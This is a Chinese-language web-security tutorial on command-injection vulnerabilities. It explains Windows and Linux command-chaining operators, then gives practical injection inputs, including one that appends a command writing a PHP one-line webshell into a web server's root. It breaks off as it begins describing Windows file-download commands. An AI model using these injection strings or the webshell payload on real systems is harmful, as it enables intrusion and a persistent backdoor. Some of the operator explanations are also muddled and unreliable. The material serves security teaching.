（web安全）命令执行漏洞。

命令执行漏洞↓

漏洞造成↓

1.代码层过滤不严格

2.系统漏洞造成命令注入

3.第三方主件

#

#

#

---

下面是（win）操作系统的特点↓

---

了解一下命令拼接符的使用↓

《1》&连接符（win）

《1》&: 这个命令的作用是  ，无论左边是false还是true，右边都执行（就是不管左边的命令是对的还是错的，都会执行右边的命令。）这个是连接符。

---

---

《2》&&连接符（win）

《2》还有&&：具有短路效果，左边是false，右边不执行。（第一个命令错误，第二个命令就不执行。）如果第二个命令错误，第一个命令对的，那就执行第一个命令。运行逻辑从左到右开始执行。

---

---

《3》管道符 |，cmd：A|B  （win）

管道符|:A|B，表示A命令语句的输出，作为B命令语句的输入执行。当A为false的时候将不会执行,命令a成立和命令b都成立，才会执行，执行的结果是b指令，不会执行a指令。

---

---

《4》管道符*2  ，||   （win）

||：A||B，表示A命令语句执行失败，然后才执行B命令语句。

如果A和B都成立，只会执行A命令语句。

#

#

#

---

下面是(linux）操作系统的特点↓

---

《1》&符号作用（linux）

Linux： &：‘&’的作用是使命令在后台运行。只要在命令后面跟上一个空格和 ‘&’。你可以一口气在后台运行多个命令。需要停止，就是kill -s 9 进程号。

---

---

《2》（;）作用（linux）

;：分号（;）  可以进行多条命令的无关联执行，每一条执行对错的结果都不会影响其他命令的执行。

---

---

《3》&&符号的作用（linux）

&&：&&左边的（命令1）执行成功(返回0表示成功)后，&&右边的command2才能被执行。

和（win系统）的管道符  |   有点相似。

---

---

《4》||符号

||： 如果 || 左边的（命令1）执行失败(返回1表示失败)，才执行||右边的（命令2），否则不执行（命令2），具有短路功能。

||符号，只有第（1）指令错误，才会执行第（2）指令。否则不执行第（2）指令。

（备注：（linux）的  | 符号作用，执行第2条命令，条件：只有第（2）指令对的，才会执行）

---

---

《5》()符号

命令执行漏洞代码结构

---

0x00 end...

---

---

命令执行漏洞实战↓

第一种类型《远程命令执行漏洞》

##直接浏览器提交执行操作命令执行##。

---

---

《远程命令执行漏洞实战》构造操作系统命令

www.baidu.com&&dir     #查看当前目录 

www.baidu.com&&echo "<?php @eval($_POST['shell']);?>" > E:\PhpStudy2018\PHPTutorial\WWW\MuMa.php   #编写一句话木马到根目录下。

---

---

《远程命令执行漏洞实战》构造win系统cmd 下载命令↓

在 Windows 系统中，可以通过多种方法在命令行（CMD 或 PowerShell）中下载文件。这里介绍几种常见的方法：

1. 使用 bitsadmin 命令

bitsadmin 是 Windows 内置的工具，可以用于下载文件。以下是使用 bitsadmin 下载文件的命令格式：